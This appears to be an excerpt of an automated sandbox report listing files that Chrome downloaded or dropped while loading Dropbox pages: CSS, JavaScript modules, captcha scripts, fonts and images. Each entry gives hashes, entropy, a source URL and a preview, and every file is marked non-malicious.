                                                                        SHA-512:4F36039DE064E436F663AD3ADBB57AF507BBD2EE20F2425F152D97BF98FA52F94CC9071C718E4D2A52CFAD55F1C6D0DF23D9C4A3171B910A31CC4BDD35D2F079
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/react_title_bar-vfl2NdC1Q.css
                                                                        Preview:.ax-visually-hidden{position:absolute !important;border:0 !important;clip:rect(0, 0, 0, 0) !important;width:1px !important;height:1px !important;margin:-1px !important;padding:0 !important;overflow:hidden !important}.ax-focusable:focus,.ax-focusable.is-focused{box-shadow:0 0 0 2px #a0d1fa;outline:none}.ax-focusable-inline:focus,.ax-focusable-inline.is-focused{text-decoration:underline}.ax-focusable--rounded:focus,.ax-focusable--rounded.is-focused{border-radius:3px;box-shadow:0 0 0 2px #a0d1fa;outline:none}.react-title-bar{position:relative;display:flex;justify-content:space-between;align-items:center;height:63px;box-sizing:border-box;background:var(--dig-color__background__base);border-bottom:1px solid var(--dig-color__border__base);width:100%}@media only screen and (min-width: 1025px){.react-title-bar{padding:auto;width:100%}}.react-title-bar .react-title-bar--title-bubble{display:flex}.react-title-bar__title-wrap{display:flex;flex-wrap:nowrap;align-items:center;height:inherit;flex-gr
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:gzip compressed data, from Unix, original size modulo 2^32 49249
                                                                        Category:dropped
                                                                        Size (bytes):14589
                                                                        Entropy (8bit):7.984195301691663
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:5843A47C4D5D5041ADCD67BBB262E61B
                                                                        SHA1:0581B5B3E444EC8C24140CC310BE57A2247D720E
                                                                        SHA-256:5D9991A336A7A9481B8A4DA450E830D4EECD91569A7982E21E90CF5969658A4B
                                                                        SHA-512:8BB93A0A1A191FECB21E89723BD06AF79A67B1604013137FAE63BC9C497F18A586D9B1457029186178825FC144A8D0A0363AC5BE3C95ABDCDE5FD881FF111331
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:...........}kw.8..w...3W.....Wl...?.O..c;.....a...P...-+2.o.S...d.{fvgwO..I.P(...B..h0...........xp.............;dM.hl...S2.|..,...s..V...02.....yc...L....#...]a..M........\....F.M....u.....K....).1.......x.@...k....u.X.37:.N.X(..Oi.<0.kw.....C..nw..p..s{kcs.a.Owz{;........E.(4.?..f..%...G8.....5...KK/....]$......h..fwK.hsk..........p..sww{c.a...+|...-.k.P.L..8.r9%...tBCa...3..x.q.....!MP.S..-.....x...,4C+..uI.w.x.[#*..dBM..JZ}...h..9<t...G...h.%AH...O..7;.?@..b......&.+...gJ<... ...M...+`....w.......K.......hC..a..)....y:4.....a2...g_..R...$}.L.KN#..M.V.l,..;[.....ml.I.m{gO3...VoO1....m`4bnl..QNb.!....@..b..n.l#..t.....9...j.0q....i...s.f.G..W..C....g..L.......gN.S..C-?....?.x.,.i.G....<pB..K~^..o]."..$...`...p..Um.#.a..t..sd.L.u.F...9..Gg.1s.9.E.Z0>q9.].......B...2.~t....}d.L-....|@C..).C......G5V<.MO..l(.2..=j%H.3.wL..qF........D......8...6.i(~"<BOO..8$mC,W.;...=?N...AF#?....3..v[.....{.`H*.Ek..T.A.[K=.9....+M.T.T{5<....7 Q....$.../...`.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:gzip compressed data, from Unix, original size modulo 2^32 535379
                                                                        Category:dropped
                                                                        Size (bytes):115960
                                                                        Entropy (8bit):7.997381113838199
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:5346C61C7F046FEFA5B699526EF2BDD1
                                                                        SHA1:6E3B72BFDB481B59722913C522CFD83F19E44765
                                                                        SHA-256:C9F126190255AEA5BCD8BF57734FAF369A153687F67CAEB01DFB6BE84EFD6DFE
                                                                        SHA-512:CC93A103B746799A9B79C9417D6F070A3B953676F5A534CC85E6760B1D90B806A9794600BBC490E608AD87D063966B1E9775B67636175CE3442910C2A7ED1FCB
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:............r.8.0.......dD..8.dZ..r..[.Z.d....-.672.%.$.K[.Q..U...W...A.$H......=5....h...Fw.....2..........s:9.x..y0....W...,...1...g.............c:...d.....zw.%.a..9....A...<.._.d..../..y....~M.[...^.i.-.)q.g<..r.,.m.}.X..Wt.p..'>.....db>..^.h...|..+.....?..^..X.....H.z....s........A.J.p.fn@|.v.}j.7...\O..."......I...c`i_].a.......g.;u...9>....t.A3@.;C3.<8D#.H...9..z...{3......H.P.4M{...4|'........|D..0.[.......&..Y.yp.m......y...37.........\O&.@a...r.",.!..`Q.#.....y.....}....k..A.....tf..*.....K..X.yD...@<..Q..$(L...a?...'.....i.k.a?@...>~..i..$.f.w...v....%@...WX.|.h..Ma.h...........xa..;......UG...../.....7m...../...~.8.>..O;W...;.N...U.....5(.......M..zy........<.vN.O.vo...,..;9.>..>X..........s.....4.L.i.........{...F.;..{..Y......W....y.J......:...;89ow/:.....z}..K.7.......Q...z.+@]......w..AGt......F..:.vz...U.\vN..sK....<o_.fq...?.;.a.}.../..:...@.....U..P.i....awx=.h...SJ.A...Ig.....J..A.*...m...U..;.4....A....v.../..~..>
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):19
                                                                        Entropy (8bit):3.4713544870139303
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:34C520D87664032692C4315FFF455D18
                                                                        SHA1:978C8B03E97680EB62057A7000F6E7FD97FB9658
                                                                        SHA-256:C40AA69F0B306CEA296DD1193C334BC0781587ED51AAB579C0433698BA9E0C4B
                                                                        SHA-512:BC6ECF7B39E2C5882C693072A7F541A7C03117A28D14067FED6FDAB6BD455FD8E79C6FE9B81FDF327E64814B91ACEE6F9C1A62134C32CF39731477B712466F38
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:Method Not Allowed.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (1424)
                                                                        Category:dropped
                                                                        Size (bytes):1804
                                                                        Entropy (8bit):5.238232457940007
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:E6BEAD11EC701E14C58FA7FEA739CA16
                                                                        SHA1:6BB317F43BAD210E6311DFAEA7074C31EC3CEB63
                                                                        SHA-256:C8ABCA1114E88F81FBAEC0F460A506759D4998EB9C91D6ED0E99BB368EE40928
                                                                        SHA-512:1D0B34E433DDD49B5D1283FDC484489754432BE627063163507AD93625E148570217EA22EF20010D4B5738F2FFACCCDEE237EED3766C95563837774B78B94518
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="15722a6d-4d79-38f7-bd87-108c114058b5")}catch(e){}}();.define(["require","exports","react","react-dom","./e_edison","./c_api_v2_routes_user_metadata_provider","./c_pap-events_sign_save_signature_doc","./c_plugin_utils_getImageDefaultSizes","./c_lodash","./c_init_data_edison","./c_hive_schemas_sharing-request_access_user_events","./e_core_exception"],(function(e,t,o,n,r,d,c,a,i,s,l,u){"use strict";function _(e){return e&&e.__esModule?e:{default:e}}var m=_(o),f=_(n);t.render=function(t,o=!1,n="",c=!1){if(!t.RootComponent){const e=d.getDebugPanelInfo();throw new Error(`Module '${null==e?void 0:e.entryPointModuleName}' does not export a React component named RootComponent.`)}let a={};if(n&&n.length>0){const{encodedProto:e}=d.unmarshalProto(n,r.InitProps);a={encodedProto:e}}const i=c?
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (18803)
                                                                        Category:downloaded
                                                                        Size (bytes):18944
                                                                        Entropy (8bit):5.505386904394291
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:F84FAD6FCDB305EAD7426C2DD34F34A0
                                                                        SHA1:E9793DB176F4835D92D0F308227E72F81C74473A
                                                                        SHA-256:CB3DE8F36682EF6C7416A21C8572C38080D403BB4F79A23DB99070BC90F402A8
                                                                        SHA-512:518C79AC5EBB62111C0E5251A031EC568DFF47E6BF2E61EF67E9262D64E3A9121837EBAE2E8A30DAB69F349C47F0B4B07EB32A180F2E03062A0D550B937F81AF
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://dropbox-api.arkoselabs.com/cdn/fc/js/74481a1c923f7bc1f60dd326ee6fbd67b25f3d89/standard/fc_bootstrap.js
                                                                        Preview:/*Want to help? We have a bug bounty program you can join at https://www.arkoselabs.com/whitehat/ or contact us at whitehat@arkoselabs.com*/.function f_b_c(){var aY=['offline_ve','toString','&data[publ','keyboard_b','\x20person','fc-iframe-','http','removeChil','?session=','check_extr','head','15191TCqcUN','passback_g','replace_fc','stener','oading_gam','async','\x20know\x20you\x20','surl','length','session_ti','undefined','meta','/fc/a/?cal','col','funcaptcha','class','apply','FunCaptcha','20qAyqWQ','show_injec','ArkoseEnfo','16054OZHuvc','ity=','%23','er_data','display','der_fix','&data[site','408px','crossOrigi','accessibil','/fc/api/no','ById','frame_wrap','getExtraDa','finished_l','removeAttr','10vQpwwA','biometrics','&litejs=1','search','Please\x20sol','ipt_url','scrolling','title','-action','js/','game\x20loade','.co','de\x20in\x20here','&action=','ity=0)','CustomEven','wrap','visible','etrics','_settings','fcAnalytic','parse','join','cript','removeEven','userAgent','sed','setTi
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):32
                                                                        Entropy (8bit):4.140319531114783
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:227DBCB1DB1EF381EA92A7A0F25143C2
                                                                        SHA1:90819BDA67447F9C423A6168CBD4E708AD76A7C6
                                                                        SHA-256:FA45850F92A11698533D3E7508B91EE7CBD3D9ADB2D3B6CFBEC0E777DAB1C0D1
                                                                        SHA-512:F399840B9F95F98F897D92F8AC602B249BFB666F418AF7C54CD458C80645BD02D245D608D6EB6049CC25A58F498710288F9DB7B968FFACF5BB4DA0A409DFCA09
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwmfY5u6ya6LkBIFDeeNQA4SBQ3OQUx6?alt=proto
                                                                        Preview:ChYKBw3njUAOGgAKCw3OQUx6GgQISxgC
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (52632)
                                                                        Category:downloaded
                                                                        Size (bytes):52633
                                                                        Entropy (8bit):4.860512027897722
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:26E143CBBB84833EF4F19A1AE556A1DA
                                                                        SHA1:DA99FFE748A7A99C53A075DDD1C3BE8E19E9A466
                                                                        SHA-256:452CBF28FB0CEEFC33F6A97848BB328B8647A5DB7BF7B2063593A3666E3726C9
                                                                        SHA-512:DE1B1B552075AAE674CE8D1427B665EAE82D0899DC525891657AD9B9A265A2525CDEBF208C64904617A19FA2378F17768701B18765BC6E30AF4205672F6481B7
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/app_actions/index-vflJuFDy7.css
                                                                        Preview:.o-scrollable{overflow:auto;overflow-y:scroll;-ms-overflow-style:-ms-autohiding-scrollbar}.o-scrollable--x-only{overflow-x:scroll;overflow-y:hidden}.o-scrollable--y-only{overflow-x:hidden;overflow-y:scroll}button.c-borderless-button{background-color:inherit;cursor:pointer;margin:0;padding:0}button.c-borderless-button:focus{outline:none;box-shadow:0 0 0 2px #cce6fa;border-radius:3px}button.c-borderless-button:disabled{cursor:not-allowed;opacity:0.5}.db-modal{overflow:hidden}.db-modal-wrapper .db-modal:focus{outline:none}.tabbing .db-modal-wrapper .db-modal:focus{box-shadow:0 0 0 2px #a0d1fa}@keyframes fade-in{0%{opacity:0;transform:translate(0, -10px)}100%{opacity:1}}.unified-share-modal{animation-name:fade-in;animation-duration:0.3s;animation-iteration-count:1;animation-timing-function:ease-in-out;width:540px;display:flex;flex-direction:column;font-size:12px;margin-bottom:160px;overflow:hidden}@media (max-width: 540px){.unified-share-modal{width:100%}}.unified-share-modal *{box-sizing:
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:gzip compressed data, from Unix, original size modulo 2^32 249816
                                                                        Category:dropped
                                                                        Size (bytes):56895
                                                                        Entropy (8bit):7.996036314212905
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:C1F6170E5D4023266717F427C4092420
                                                                        SHA1:3C1EF6DF484E9C1C608530C35C1A45AC8E90CB27
                                                                        SHA-256:CAC182038590916968F2ACBDA6F52FA81EEAE6A7BA334CD27DC4DC8DD013E642
                                                                        SHA-512:111D0EE67593C4C75964272323E70A9AB7D27ECD535155EE1D18F34A44FD61EA7E95395509BC8144408323D917A8D32DFB1E58A7D9296709BC0FE3579F3767FF
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:...........[o..z ...".........i.j)%..[.R.]. P..L...YdP)...../g_.x}.;;....>........./.....OX|..{.y.T]=v..$...........~y.w..........l...=..4F..x8.P...u...J..#.....r....c.A.G.!.ui..'.`..7..B.5%.......}.-.....Um.j..v_Z\[]].+H..V...W|..=..-Zi`.U.:..V.Vc...>...-.1:rI...N.Z...y....T..oL.G...PmP}.-.Iz=..w.k...*WK...-..V.......VV...U..XYX\Z^P5.......y.VV.K.+.......%U........Vj....2....X..Z..P]y.j=.w.V}.j}.+._//..Z....r..jmh.V..70...hz...Wk..vg(U...`;w1u...%...e[k...}.yf.y.r.r..N..2...m.+.....jE.P...*..+MhXn.*S.2....h..Em.......%...[.B5.6..e.P..6.k.F4K....RC....L.Q.F...C.eS.6I.O0..8.....\.*/z.....;."..6Fn.....a..)E......G6.4.....N..l........v..o.l..*5|..v....k...].N.eS..A'...5q.Y...-.9Z&n.....T...1|.......!.U.3..h...E|..E....B.q:.....[h.[..1..0..#....i...^b...c..... .cw....R.M..><..d..zx@..r....d.PJz.LM......u..].uy./.).m.?....Bf.C.F|I...-......y...#X.z.(.V....3.A.........Wr..]\.tqnt.;.;.Y.XQ.4.r0..0.'..|P.,..o..6.a.A.1Sch..%1e......Z..3.|.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:PNG image data, 864 x 312, 8-bit colormap, non-interlaced
                                                                        Category:dropped
                                                                        Size (bytes):7694
                                                                        Entropy (8bit):7.863237563491769
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:18C83A3E1DDABC4628D5EC53D270AF78
                                                                        SHA1:08AD22AACA5ACFB57757142E36A9F9BA3631BEE4
                                                                        SHA-256:7AD8498FCC83F0CF754E7AF0E03B8E73A937514C16EF59D7F20342D1A6D30A4C
                                                                        SHA-512:3158503CA9D1F244671619EC1FEA30E4F3DD1551000D9AAECFE9E3F4961AED814DED416ABDEAE64CA1D54B3E464D1F16B2152AB6ACA2BAF4CA5688CB537B8F53
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:.PNG........IHDR...`...8.......`%..._PLTE...www..........P!.........~........ ...@@@PPPppp...... ................................```..........$$$///......---***CCCiii.........FFFJJJ.......666...<<<VVV......ccc......888YYYlll....333...fff...ttt.........zzz.........................NNN'''...!!!\\\............|||...nnn...111>>>...............xxx...........SSS...LLL...qqq............../i...jIDATx^..!........OL.,n.........@..O.... ............2I|...t..0..P....Q.k.B..!A4..`.p...J....... ....n......................................`...``0.``0.``00.`00...0.................:0...0...........................`P.u]...`...X..O..X..#.{.N..Fp;7.e..a0.m.....mVi0_.....:......O.........A.pQ.+..x.HU...B.[}..H)j.....ON.0..(....p...........oS..le.......H./y..........X`"0.Xr....B..=.;d>jP.<Z*0....3..#.8=..P.1E.T`"0.X..U..C..lQ...B.I.m...GzD"0.X_.hf`.U..;..%=cT.k.^?=>...,.C....b..T.9.Y.7Nj...j..e0<F.N.&..FQi9_p...C...Q....M5I.&0..Q%.\v...._.Yzt"0..g.e.W.6e...#.```.T#O.4......6I.M.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (11707)
                                                                        Category:dropped
                                                                        Size (bytes):12079
                                                                        Entropy (8bit):5.2897808427491055
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:A4F264A9852980FFF775001B74EBEED0
                                                                        SHA1:7DA444E42F30DA213F96EB0BB4B59AAB64BC538C
                                                                        SHA-256:00B7CCA44FB446816B0C2E2969BF3E985291DCB4FFB464326DFFE7E44CD3F4BD
                                                                        SHA-512:4303463FBEA2839E84F8098CE90563842F53CB64B3C39ADC1609E8104A7191EB54C0B1018E96CD38632907D80EA6C374BECFB1F281264C4CEE0964D906390237
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="79c23841-3ec4-3412-aa3c-e49aa5c5cc1e")}catch(e){}}();.define(["exports","./c_api_v2_routes_user_metadata_provider","./c_hive_schemas_sharing-request_access_user_events","./e_core_exception"],(function(e,t,n,r){"use strict";var a,o,i;function s(e){const t=i[e];return"string"!=typeof t?e.toString():t[0].toLowerCase()+t.substring(1).replace(/[A-Z]/g,(e=>"_"+e.toLowerCase()))}e.MethodKind=void 0,(a=e.MethodKind||(e.MethodKind={}))[a.Unary=0]="Unary",a[a.ServerStreaming=1]="ServerStreaming",a[a.ClientStreaming=2]="ClientStreaming",a[a.BiDiStreaming=3]="BiDiStreaming",function(e){e[e.NoSideEffects=1]="NoSideEffects",e[e.Idempotent=2]="Idempotent"}(o||(o={})),function(e){e[e.Canceled=1]="Canceled",e[e.Unknown=2]="Unknown",e[e.InvalidArgument=3]="InvalidArgument",e[e.DeadlineExceeded=4]
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 78992, version 1.0
                                                                        Category:downloaded
                                                                        Size (bytes):78992
                                                                        Entropy (8bit):7.996774816040856
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:CBDA27012EF85AF41A43B5F63F8F01DE
                                                                        SHA1:1013AF6F986DFE48FB0B1DD32FEEEC6D9832F92F
                                                                        SHA-256:85562292D87897A6E0F1EB0E1DBACDF1F89B6A607393484F1B5D5987CD7908BC
                                                                        SHA-512:0ED76162E316CFC4B8EF08E86D8DCFC7C1F24F279727DFF657BBB9742983BC9FA33213C040A64E80502C4D45C1AEB99042AEB727B573836D0A146FE98B60F339
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://paper.dropboxstatic.com/static/fonts/AtlasGrotesk-Bold-190618-Web.woff2
                                                                        Preview:wOF2......4........\..40...........................t..f.`..|.>..s.....@..H..4..6.$..d. ..0.....T[.[...6..om....ZUw}...-.(.?..r....%j.5<._..h.+.....]oV.,............]2.s...$9q..._.B....F.A.Q....Z..j..D..np..<^2<....f......8j.J8.2.....2...j.V.g.i.E5......H1.o=.\.;L......].H...L..z.....Yd4......].Z..w.3.i..=F.Y.m...aY"...w&_..p{....{.hO...:.n.x.8yQ....L.e.pi.].~....."&....F.W...""..".A...ff+...l...2.O.G..y.....D.0..U........e..Q%.q.o...&."..;.<h..+...xP.a..a...../4......|A(.U...f.....;.....r.r...Gg.k..A...%.J.......\%U&.+x..|.....w...U..YcB.2K.{>.&.....O.5G........z..Sk.].......P..K...-.9...X.?..+7..&..S....q.3-....p....X...J.*.O...z....wI...s.....R.......(...4k.....<..l........p4....O_..}jBIM...E&.................$|...a6xJ...q......S..R3.5.b...f3D..cE@|g...........,.x..Q...F.8...a.""..... ly...-...?...g......pi"..4.......h......]}...8<9;g.....J..j=.v........F.jTm..........B.Y....{D.5..K...$.@h.>.....=...J4......b.X(...X....."j^..W|.n..h....6...Q1..1.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (1502), with no line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):1502
                                                                        Entropy (8bit):5.738130745504338
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:7780D202E9E6C82008740D2610A9DAF5
                                                                        SHA1:2DCFB3CB3D9C8E58EF75D9C7FCDFC54B9C862034
                                                                        SHA-256:CDC913528BB07D21C0FA3336CED917779CB978E8E8970F75C80C7230848DD3C1
                                                                        SHA-512:6726422B1178733260E90FCF13282FD30D2DC9F9EEE5B97C4ED1816EB0F13D7A7ADED480914612D74C2E508679033DD59390B58D544C1ABAEF18B6139A6BCC90
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://www.google.com/recaptcha/api.js?hl=en&onload=recaptchaOnloadCallback&render=explicit
                                                                        Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('explicit');(cfg['onload']=cfg['onload']||[]).push('recaptchaOnloadCallback');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true; po.charset='utf-8';var v=w.navigator,m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='A/kargTFyk8MR5ueravczef/wIlTkbVk1qXQesp39nV+xNECPdLBVeYffxrM8TmZT6RArWGQVCJ0LRivD7glcAUAAACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9';if(v&&v.cookieDeprecationLabel){v.cookieDeprecationLabel.getValue().then(function(l){if(l!=='treat
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (5063)
                                                                        Category:downloaded
                                                                        Size (bytes):5452
                                                                        Entropy (8bit):5.455719462860388
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:2BF0D150025E349E06DB589524A41E51
                                                                        SHA1:86981D869BEA8DAC678114CF79334259C5E74A0C
                                                                        SHA-256:BD6E352CE3AB0E2AE4C3BC60418610C049790D73FC5295FCFBF5CDFE3A7A2C36
                                                                        SHA-512:0F318CF1032146028201004345C34971E41FB768787820CAEBB50D7527D63783040799E8946E62A20A4957FEAC7CC7CD7124FF682FB76873F4B1F42C8EAED2B4
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_plugin_utils_getImageDefaultSizes-vflK_DRUA.js
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="eecd4a4f-1f09-3875-a3c7-76724a7e6d73")}catch(e){}}();.define(["exports","./c_lodash"],(function(e,o){"use strict";function i(e=navigator.userAgent){const o=function(e){const o=e.toLowerCase(),i=/(ipad)/.exec(o)||/(crios)[ \/]([\w.]+)/.exec(o)||/(fxios)[ \/]([\w.]+)/.exec(o)||/(opt|opr|opios).*[ \/]([\w.]+)/.exec(o)||/(edge)[ \/]([\w.]+)/.exec(o)||/(edg)[ \/]([\w.]+)/.exec(o)||/(chrome)[ \/]([\w.]+)/.exec(o)||/(webkit)[ \/]([\w.]+)/.exec(o)||/(opera)(?:.*version|)[ \/]([\w.]+)/.exec(o)||/(msie) ([\w.]+)/.exec(o)||/(trident).*? rv:([\w.]+)/.exec(o)||o.indexOf("compatible")<0&&/(mozilla)(?:.*? rv:([\w.]+)|)/.exec(o)||[],n=o.match(/version\/([\d.]+)/i);let t=null!=n?i[1]:null;return"webkit"===t&&(t=null!=n?n[1]:null),{browser:i[1]||"",version:t||i[2]||"0",userAgent:e}}(e);return"tri
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (55096)
                                                                        Category:downloaded
                                                                        Size (bytes):189455
                                                                        Entropy (8bit):5.115429079982637
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:587BFE0AC4E78E99A00C3577CD83F429
                                                                        SHA1:9E9C34BD0FC72E128E96CA87288DF005D6B8802A
                                                                        SHA-256:0F5EE3EC4B1560D2396BCA3B4837A6B4FB9F1179F82276C71FF1EC5DE98AD43C
                                                                        SHA-512:D67D939AD49D5D7F0E9760BB4CFF694255482725E6D96DF2AA7D2F105B9B71E561C239B6ACA8571ABF0E2D3D26F612CCF20237E2CE7FC52EC73259523343B0D3
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/dig-components/components-vflWHv-Cs.css
                                                                        Preview:/** @generated -- This file is automatically synced from @dropbox/dig-components@20.8.0. DO NOT MODIFY! **/../**. This file should not be imported into your CSS or SASS files - the CSS variables will be available on the page for you to use.. DO NOT USE THIS FILE OR THE CSS VARIABLE TOKENS WITHOUT FIRST TALKING TO THE DESIGN SYSTEMS ON-CALL (SEE #design-systems ON SLACK).**/../*! autoprefixer: off */./* -- tokens.css */..dig-Mode--bright,:root{--scheme__color:light;--scheme__inverse__color:dark;--spacing__base_unit:8px;--spacing__unit--0_5:4px;--spacing__unit--1:8px;--spacing__unit--1_5:12px;--spacing__unit--2:16px;--spacing__unit--2_5:20px;--spacing__unit--3:24px;--spacing__unit--4:32px;--spacing__unit--5:40px;--boxshadow__elevation1:0px 8px 32px rgba(30,25,25,.03),0px 8px 16px rgba(30,25,25,.03),0px 4px 8px rgba(30,25,25,.03),0px 2px 4px rgba(30,25,25,.03),0px 1px 2px rgba(30,25,25,.03);--boxshadow__elevation2:0px 16px 80px rgba(30,25,25,.03),0px 32px 48px rgba(30,25,25,.03),0px 16p
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:PNG image data, 430 x 401, 8-bit colormap, non-interlaced
                                                                        Category:downloaded
                                                                        Size (bytes):29945
                                                                        Entropy (8bit):7.984835860731597
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:92565CB436410690FE795762E05CA10E
                                                                        SHA1:C6749F285F9EEF7615410C92E8E64BF36D7CD00C
                                                                        SHA-256:228327EAD5636B35C3DA1BB936BF4D05C18CA1E77D4178E8C54F0AF258FAE401
                                                                        SHA-512:C7E8CE502DA36A286E4CED90F72172262A61A731549294FF00A7D8948AD2739A666BD7F910F184801C4CDAE632BA0B17EEC2CB0FEF29C06AB8B3CBC0D6FBBB5B
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://static.cdninstagram.com/rsrc.php/v3/y5/r/TJztmXpWTmS.png
                                                                        Preview:.PNG........IHDR.....................PLTEGpL..................//3............$$$&&&&&&'''""#&&&'''&&&)))$##)**...'''&&& &&&%%%&&&&&&...&%&&&&&&&&&&%%%&&&&&&.....~&%%&%&&&&&&&...)))&&&.........%%%..`............&&&............&&&&%%%%%.........'''...................%...........878...................6j......8...........&........7..8.........1.......777.->.......0@............0.....#. ......:........7....\.7.......3e666.4R777.YX666jim.....[..\..Q..Y....0..4..........0w.2v666...........A.1.#. 666.@...W777777.zA8..666.;.D...r..m>.sB.XP........Y...XW...ID..#o.Ne....&&&7..'''...#. ...655...8Q.....-q........../..=].gB.q1.3.cO..PI.0...7......6...[R^.wI...Tvuv...w:..>...E...3.]\\?...f..2.....e.....oD......~........b....GGG.~....jjj.Ek..........J.....t.$.k}....h....^.....tRNS............>..Q.5.-'J>fo".X.x.............;^B..... ...".c....8.D.,..9.OuSo....cv..6.u.bJ.7X..........).fp..._...T.[.q...8..9W..b..........v.}.......].........[.\...q.IDATx^..MK.[..p....I4.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (4741)
                                                                        Category:downloaded
                                                                        Size (bytes):5137
                                                                        Entropy (8bit):5.317891000717735
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:0692739F4B069492899BF7D2D199C581
                                                                        SHA1:A38CECEEFDEF381060E0FCF06703F5171AC82403
                                                                        SHA-256:7515666FA44F2CE239AB7A95807D9D2A8109014A1BDC0E5C4E468C1D6A0A1B0F
                                                                        SHA-512:1D3C5EAD4A9BDE86393A74945D00830477A70B31DA1633C9B6269CA55203CDCDB9C89A38581E72D3FE6D0448C7381436E07B6CF5D23B102FA5E26FD7453992B7
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_unified_susi_register_password_validator-vflBpJzn0.js
